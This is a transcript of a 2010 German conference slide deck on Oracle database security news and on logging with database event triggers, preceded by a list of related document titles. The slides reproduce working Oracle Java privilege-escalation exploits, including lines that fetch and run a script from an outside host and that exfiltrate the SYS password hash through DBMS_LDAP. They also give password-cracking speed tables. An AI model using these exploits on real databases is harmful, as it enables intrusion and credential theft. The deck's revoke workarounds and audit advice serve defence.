DOAG Regional-Treffen München

Ähnliche Dokumente
DOAG Konferenz Best of Oracle Security Alexander Kornbrust 16-Nov Red-Database-Security. .consulting.solutions.

DOAG 2016 Oracle APEX Security

Best of Oracle Security 2006

Schlüsselworte Oracle Security, DBA in 2 Minuten, Metasploit, DB18, 0day, Oracle View Bug, SQL Injection, Unwrapper, dbms_assert, shellcode

Best of Oracle Security 2007

<Insert Picture Here> Security-Basics. Privilegien, Rollen, SQL und PL/SQL - inkl. 12c-Update. Carsten Czarski, ORACLE Deutschland B.V. Co.

Datenbank Rootkits. Alexander Kornbrust 01-April Red-Database-Security GmbH. Alexander Kornbrust, 01-Apr-2005 V1.07 1

Kapitel 4 Dynamisches SQL

Privilegieneskalation in Oracle 12c (und älter)

Dynamisches SQL. Folien zum Datenbankpraktikum Wintersemester 2009/10 LMU München

Oracle Rootkits & Oracle Würmer - neue Bedrohungen für Datenbanken? Alexander Kornbrust 27-September Red-Database-Security GmbH

Kapitel 4 Dynamisches SQL

Oracle 12c: Neuerungen in PL/SQL. Roman Pyro DOAG 2014 Konferenz

Oracle Security jetzt und in der Zukunft

EE SE1 Oracle RDBMS. Andrew Lacy Solution Architect. OPITZ CONSULTING Deutschland GmbH. Foto: Siobhan Bickerdike

Oracle Sicherheit. Alexander Kornbrust 18-Oktober Red-Database-Security GmbH. Alexander Kornbrust, 18-Okt-2005 V1.02 1

Härtung von Oracle12c Release 1 & 2 Datenbanken Norbert Debes Externer Oracle Datenbankadministrator am Deutschen Patent und Markenamt München

Betroffene Produkte: Alle Versionen von Oracle Forms (3.0-10g, C/S und Web), Oracle Clinical, Oracle Developer Suite

Oracle Rootkits. Marco Patzwahl MuniQSoft GmbH München-Unterhaching

Neuerungen in Marco Patzwahl MuniQSoft GmbH Unterhaching

Erkennung von Datenbank- Angriffen über Webserver und automatische Gegenmaßnahmen (am Beispiel von einer Oracle RDBMS)

Individuelles Auditing von vielen Datenbanken

Username and password privileges. Rechteverwaltung. Controlling User Access. Arten von Rechten Vergabe und Entzug von Rechten DBS1 2004

Oracle Anti-Hacking. Red Database Security GmbH IT-Verlag München Matthias Glock. Red-Database-Security GmbH

Praktische SQL-Befehle 2

SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";

SW-Entwurf von selbstverteidigenden Systemen

Oracle Database Vault Beispiele zur Benutzung

NoSQL mit Postgres 15. Juni 2015

Schnellübersichten. SQL Grundlagen und Datenbankdesign

12. Datenschutz: Zugriffsrechte in SQL Datenschutz: Zugriffsrechte in SQL

Powerful PL/SQL: Collections indizieren mit VARCHAR2-Indizes

Sicherheit und Datenschutz in SAP Systemen. Die Rolle von SAP Sicherheit in der IT-Sicherheit

Datenschutz: Zugriffsrechte in SQL

Kapitel 9. Embedded SQL. Prof. Dr. Wolfgang Weber Vorlesung Datenbanken 1

Wie sicher sind Ihre Daten in der DB?

Prozedurale Datenbank- Anwendungsprogrammierung

Vergessene (?) SQL- und PL/SQL- Funktionen

Entwicklungsumgebung für die Laborübung

Oracle 10g Einführung

Auditing Sinn, Einsatzmöglichkeiten und Performance

11g Database Manageability.

Übung PL/SQL Trigger Lösungen

Auditing und Härtung von Oracle Datenbanken

TOra - Toolkit for Oracle

Donnerstag, 10. November h00, Musensaal Database. LogMiner im Einsatz. Marco Patzwahl MuniQSoft GmbH, Unterhaching b.

Erfahrungsbericht mit Oracle Spatial

Oracle 11g Release 2: Änderungen unter der Haube. Dierk Lenz DOAG 2011 Konferenz und Ausstellung 16. November 2011

Logging und Debugging. Gerd Volberg OPITZ CONSULTING Deutschland GmbH

DB2 Version 10 Kapitel IT-Sicherheit

Kuriositäten in der Oracle-Datenbank

Critical Patch Update und Ihre Applikation funktioniert noch?

Softwaresicherheit. Eine Präsentation von Benedikt Streitwieser und Max Göttl. Einführung Kryptographie und IT-Sicherheit

Überblick Felix Naumann. Zugriffsrechte Zugriffsrechte erzeugen Zugriffsrechte prüfen Zugriffsrechte vergeben Zugriffsrechte entziehen

Rainer Meisriemler. STCC Stuttgart Oracle Deutschland GmbH 2 / 64

In diesem Anschnitt geht es um die SQL Anweisungen, mit denen ich den Zugriff auf das Datenbankschema steuern kann.

Ab Version 10g werden von Oracle alle unwichtigen Accounts automatisch bei der Installation über den grafischen Installer gesperrt.

Powerful PL/SQL: Collections indizieren mit VARCHAR2- Indizes ein Praxisbeispiel

Chancen und Wachstumsfelder für PostgreSQL

Oracle Enterprise Manager 12c Database Express (EM Express)

Oracle Virtual Private Database

Oracle Security Trends und Ausblick für 2009

Dipl. Inf. Dipl. Math. Y. Orkunoglu Datum:

Entwicklungsumgebung für die Laborübung

Oracle Security. Seminarunterlage. Version vom

Datenbank-Administration mit personalisierten Accounts

ODBC-Verbindungen in Oracle-Datenbanken nutzen

Funktionen. Überblick über Stored Functions. Syntax zum Schreiben einer Funktion. Schreiben einer Funktion

Automatisierungs-Methoden für Multi-Schema-Handling

Inhaltsverzeichnis. Vorwort Einleitung... 15

SQL and PL/SQL unleashed. Neuheiten bei Oracle 11g und Oracle 12c im Bereich SQL und PL/SQL

SQL (Structured Query Language) Schemata Datentypen

Die Nutzung von Webservices in der Oracle Datenbank. 11 März 2010

Fakultät für Informatik & Wirtschaftsinformatik DB & IS II - WS Metadaten. Andreas Schmidt Metadaten 1/17

QMF Tabelle Q.OBJECT_DATA in DB2

DOAG ORACLE LogMiner

Oracle Flashback. in der Praxis Dr. Frank Haney 1

Kapitel 8: Zugriffskontrolle

Entwicklungsumgebung für die Übung

ÜBER RECHTE/ROLLEN UND DEN SICHEREN BETRIEB DER DATENBANK

3.17 Zugriffskontrolle

Flexible und automatisierte Reaktionen auf Sicherheitsvorfälle

6 Sicherheitskonzepte in Oracle

Historisierung und Versionierung

7 DCL (Data Control Language)

Johannes Ahrends CarajanDB GmbH CarajanDB GmbH

Multimedia im Netz Wintersemester 2013/14. Übung 02 (Hauptfach)

Oracle SQL. Seminarunterlage. Version vom

Oracle 10g Einführung

Ist die Standard Edition noch einsetzbar? Dierk Lenz DOAG 2015 Konferenz

Oracle Developer Monthly Datenbank-Update für Anwendungsentwickler

Kapitel 10. JDBC und SQLJ. Prof. Dr. Wolfgang Weber Vorlesung Datenbanken 1

Performance für Oracle Anwendungen nicht nur für Oracle 11g

Oracle Security Technology Day: Oracle Security - Trends und Ausblick für 2009

Verwendung und Einsatzmöglichkeiten des Flashback-Query

Praktikum: Datenbankprogrammierung in SQL/ORACLE. Zugriffsrechte an ORACLE-Account gekoppelt initial vom DBA vergeben SCHEMAKONZEPT

Transkript:

DOAG Regional-Treffen München Alexander Kornbrust 21-Apr-2010

Über Red-Database-Security! Red-Database-Security GmbH! Specialisiert in Oracle Security! Mehr als 400 Oracle Security Fehler gemeldet! Kunden weltweit! Services und Produkte! Security Audits! Oracle Security Training! Oracle Security Software Solutions

Table of Content Inhalt Oracle Security News Verwendung von Datenbank Event Triggern

Oracle Security News Oracle 0Day in Java (korrigiert mit CPU April 2010) Oracle CPU April 2010 Neuer Oracle Password Cracker PL/SQL Unwrapper für Oracle 10g/11g veröffentlicht Oracle & MitM

Oracle 0day in Java Als Abschiedsgeschenk von David Litchfield, der sich aus dem Datenbank-Security Thema zurückzieht. Zuerst auf der Blackhat DC veröffentlicht. Auf den Präsentationsfolien waren die Exploits zu sehen. Ein Video der Präsentation davon tauchte im Internet auf und verbreitete sich sehr schnell. Diese Lücke betrifft Oracle alle Versionen 11.2, 11.1 und 10.2. Mit dem April 2010 CPU/PSU bzw. der Version 11.2.0.1 für Windows hat Oracle dieses Problem gelöst. Weiterhin wurde von David gezeigt, wie man die 11g Netzwerk ACLs umgehen kann (" SELECT SYS.DBMS_LDAP.INIT ((SELECT PASSWORD FROM SYS.USER$ WHERE rownum=1) '.orasploit.com',80) FROM DUAL "). Utl_http, httpuritype, funktionieren standardmäsig in 11g nicht mehr.

Oracle 0Day in Java (10.2) DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY; CURSOR C1 IS SELECT 'GRANT',USER,'SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' FROM DUAL; BEGIN OPEN C1; FETCH C1 BULK COLLECT INTO POL; CLOSE C1; DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL); END; / SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/ Wrapper','main', '/oracle/10g/bin/sqlplus', '/ as sysdba', '@http://www.orasploit.com/becomedba.sql') FROM DUAL;set role dba;revoke dba from public;

Oracle 0Day in Java (10.2) -- Privilegien Eskalation DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY; CURSOR C1 IS SELECT 'GRANT',USER,'SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' FROM DUAL; BEGIN OPEN C1; FETCH C1 BULK COLLECT INTO POL; CLOSE C1; DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL); END; / -- Ausführen beliebiger OS Befehle SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/ Wrapper','main', 'executable', 'param1', 'param2') FROM DUAL;set role dba;revoke dba from public;

Oracle 0Day in Java (11.2) DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY; CURSOR C1 IS SELECT 'GRANT',user,'SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' FROM DUAL; BEGIN OPEN C1; FETCH C1 BULK COLLECT INTO POL; CLOSE C1; DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL); END; / SELECT DBMS_JAVA.SET_OUTPUT_TO_JAVA('ID','oracle/ aurora/rdbms/dbmsjava','sys', 'writeoutputtofile','text', NULL, NULL, NULL, NULL, 0,1,1,1,1,0,'DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''GRANT DBA TO ' user '''; END;', 'BEGIN NULL; END;') FROM DUAL;EXEC DBMS_CDC_ISUBSCRIBE.INT_PURGE_WINDOW ('NO_SUCH_SUBSCRIPTION', SYSDATE());set role DBA;

Oracle 0Day in Java - Workaround Revoke execute on dbms_java from public; Revoke execute on dbms_java_test from public; Revoke execute on dbms_jvm_exp_perms from public; Revoke execute on oracle/aurora/util/wrapper FROM PUBLIC; Revoke execute on oracle/aurora/utl/paramparser from PUBLIC; grant execute on DBMS_JVM_EXP_PERMS TO IMP_FULL_DATABASE; grant execute on DBMS_JVM_EXP_PERMS TO EXP_FULL_DATABASE; grant execute on dbms_java to system; (any OEM database user) to avoid problems with public synonyms

Oracle April 2010 Korrektur von 7 Sicherheitslücken in der Datenbank. Der kritischste lt. Oracle mit CVSS 7.1 ist ein Buffer Overflow im Create User Kommando. Meiner Ansicht nach jedoch eher unkritisch, da ein Benutzer normalerweise keine "CREATE USER" Rechte hat. Meines Erachtens der kritischste ist der Java Fehler (wie vorhin gezeigt) mit einem CVSS Rating von 6.5 bzw. 4.0. Von Red-Database-Security wurde ein Fehler korrigiert, der es erlaubt Daten mittels "explain plan" zu extrahieren, ohne dass Auditing dies mitbekommt. Empfehlung: Unbedingt einspielen

Neuer Passwort Cracker OPS_SSE2 Dennis Yurichev hat einen neuen Passwort Cracker veröffentlicht, der ca 3 Mal schneller als der bisherige Spitzenreiter ist. Auf schnellerer Hardware kann sogar die 10 fache Geschwindigkeit erreicht werden. Dadurch kann ein 8- stelliges DBA Passwort (Zahlen & Ziffern) innerhalb eines Tages geknackt werden. Kritische Passworte (DBA, Anwendungen,...) sollten mindestens 10 Zeichen (9i-10g) bzw. 11 Zeichen (11g) lang sein. Die neuen SHA1 Hashes können sogar bis zu 20 Mal (!!!) schneller geknackt werden. Alte DES-Hashes sind sicherer als neue SHA1-Hashes

Repscan / Woraauthbf Length cs cs 6 26 73 s 36 8.5 min 7 26 31 min 36 5 h 8 26 13 h 36 7.6 d 9 26 14 d 36 274 d 10 26 1 yrs 36 27 yrs Repscan 3.0, 4,400,000 pw/second QuadCore 2.4 GHz http://soonerorlater.hu/index.khtml?article_id=513

OPS_SSE2 Length cs cs 6 26 7 s 36 1 min 7 26 3 min 36 30 min 8 26 1,5 h 36 19 h 9 26 1,5 d 36 30 d 10 26 1,2 mon 36 3 yrs OPS_SSE2, 36,500,000 pw/second Dual Six-Core AMD Opteron(tm) Processor 2427 (2.2 GHz)

Oracle Man-In-The-Middle Angriff Auf der Security Konferenz "Blackhat 2010 Europe" wurden letzte Woche von Steve Ocepek und Wendel Guglielmetti Henrique 2 neue Tools Vamp und Thicknet vorgestellt, mit denen man laufende Oracle Sessions kapern und die Inhalte verändern kann. Damit ist es ohne großes Wissen mögliche, eine unverschlüsselte Oracle TNS Session zu übernehmen. In Zukunft wird man solche Angriffe häufiger sehen. Diese Tools werden zur Zeit noch verbessert und dann zum Download zur Verfügung gestellt.

Oracle Unwrapper Niels Teusink hat auf seinem Blog einen Python Unwrapper für Oracle 10g/11g Code veröffentlicht. Damit kann man gewrappte Packages wieder in den unverschlüsselten Ursprungszustand zurückversetzen. http://blog.teusink.net/2010/04/unwrapping-oracleplsql-with-unwrappy.html

Verwendung von Datenbank Event Trigger zur Erhöhung der Sicherheit

Logon Trigger Protokollieren alle Logon Versuche mit Zusätzlich zum "Create Session" werden hier auch Datenbank Jobs mitprotokolliert. Zur Reduzierung der Daten sollten Jobs, häufig wiederkehrende Daten ausgeblendet werden.

DDL Trigger Protokollieren alle DDL Befehle mit Gute Übersicht, wer was in der Datenbank verändert hat. Z.T. werden DDL Befehle von Oracle abgesetzt

Error Trigger Protokollieren (fast) alle Datenbank Fehler mit Findet Konfigurationsfehler Hilft bei der Fehleranalyse Erlaubt das Entdecken von Angriffen über SQL Injection (hauptsächlich bei Webanwendungen)

Screenshots

Screenshots

Screenshots

Screenshots

Screenshots

Beispielcode Beispielcode wird zusammen mit dieser Präsentation veröffentlicht

Fragen? Fragen?

Contact Red-Database-Security GmbH Bliesstraße 16 66538 Neunkirchen Germany Phone: +49-174 - 98 78 118 Fax: +49 6821 91 27 354 E-Mail: training@red-database-security.com

2024 © DocPlayer.org Datenschutzbestimmungen | Nutzungsbedingungen | Feedback